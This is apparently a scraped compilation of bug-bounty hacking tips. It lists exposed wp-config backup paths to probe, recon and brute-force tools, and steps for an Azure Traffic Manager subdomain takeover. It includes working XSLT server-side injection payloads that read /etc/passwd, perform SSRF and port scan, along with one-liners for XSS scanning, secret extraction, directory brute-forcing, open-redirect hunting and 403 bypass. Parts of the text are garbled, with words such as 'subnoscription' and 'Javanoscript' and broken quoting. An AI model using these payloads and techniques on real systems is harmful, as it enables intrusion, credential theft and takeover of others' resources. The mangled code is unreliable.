🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨

/wp-config.php-backup /wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json

👉NipeJS is a powerful tool designed to detect JavaScript leaks through precise regex pattern scanning, streamlining the identification of potential data leaks within code.

📥https://github.com/i5nipe/nipejs

🚨Tools collection🚨

Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api

Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network

Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM

Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch

Wordlists we can use !
1. seclists
2. Assetnote

How to find Broken Authentication in 30 seconds or less using Autorize

👉Setup Your Autorize in Burp

1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column

🌟Load Balancer Takeover🌟

Step 1: Identify .trafficmanager.net subdomains. 🕵️‍♂️

Step 2: Use your Azure subnoscription to access the Traffic Manager profile. 🌐

Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. 🛠️

Step 4: Add an endpoint for redirection to your desired site. 🔄

🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1

The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).

 1.⁠ ⁠Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

 2.⁠ ⁠SSRF
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>

OR

<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include>

3. Javanoscript Injection
<xsl:stylesheet xmlns:xsl="http://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<noscript>confirm("We're good");</noscript>
</xsl:template>
</xsl:stylesheet>

4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>

🌟Find JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!

Remote Code Execution via Local File Inclusion POC by Abhishek Morla

USB Forensics 🤯🤯

XSS Checks Made Easy 🌐

Example: Execute XSS checks on a list of URLs with a single command.

One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt 

Uncover Hidden Parameters in Seconds 🕵️‍♂️

Example: Extract hidden parameters from URLs effortlessly.

ONE LINER: 
cat alive.txt |rush curl -skl “{}” |grep “type\=\”hidden\”” |grep -Eo “name\=\”[^\”]+\”” |cut -d”\”” -f2 | sort -u’ | anew params.txt 

Reveal Secrets in JavaScript Files 🕵️‍♂️

Example: Identify sensitive data in JavaScript files like a pro.

One-Liner: 
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder

Crush Directories with Effortless Bruteforce 🔍

Example: Discover hidden directories and files effortlessly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt 

Expose Log4J Vulnerabilities with Ease 🔍

Example: Identify Log4J vulnerabilities on the fly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @" 

Hunt Down Sneaky Open Redirect🎯

Example: Uncover open redirects like a seasoned hunter.

One-Liner: 
gau http://vuln.target.com | gf redirect | qsreplace “$LHOST” | xargs -I % -P 25 sh -c ‘curl -Is “%” 2>&1 | grep -q “Location: $LHOST” && echo “VULN! %”’ 

Capture Screenshots in a Snap 📷

Example: Capture screenshots of live websites effortlessly.

One-Liner: 
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' 

Know Your WordPress Version 📝

Example: Discover the WordPress version of a target website instantly.

One-Liner: 
curl -s 'https://target.com/readme.html' | grep 'Version' 

Unearth Subdomains Containing JavaScript 🌐

Example: Find subdomains with JavaScript files in a snap.

One-Liner: 
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS 

Bypass 403 Login Pages with Finesse 🚪

Example: Bypass 403 login pages like a pro.

One-Liner: 
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent

🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟

👉Tool - https://lnkd.in/gk4-_4yw
👉Blog - https://lnkd.in/g4W7eA7R

Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf

Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf

Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html

File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf

IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b

XSS-https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet

SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet

XXE-https://link.medium.com/lprTDcXRYgb

SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery

2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view

CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration

Business Logic Flaws-https://link.medium.com/MX5hzfESYgb

CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/

Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning

HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding

Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

SAML-https://github.com/e11i0t4lders0n/SAML-SSO

Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html

S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007

Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection

WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages

🌟Find Waybackurls JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.

2. Add this Regex in URL Section.

javanoscript:(function() {  var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, ''));  var newURL = 'https://web.archive.org/cdx/search/cdx?url=%27 + currentURL;  window.open(newURL, %27_blank%27);})();

3. Now open any site and click on your bookmark!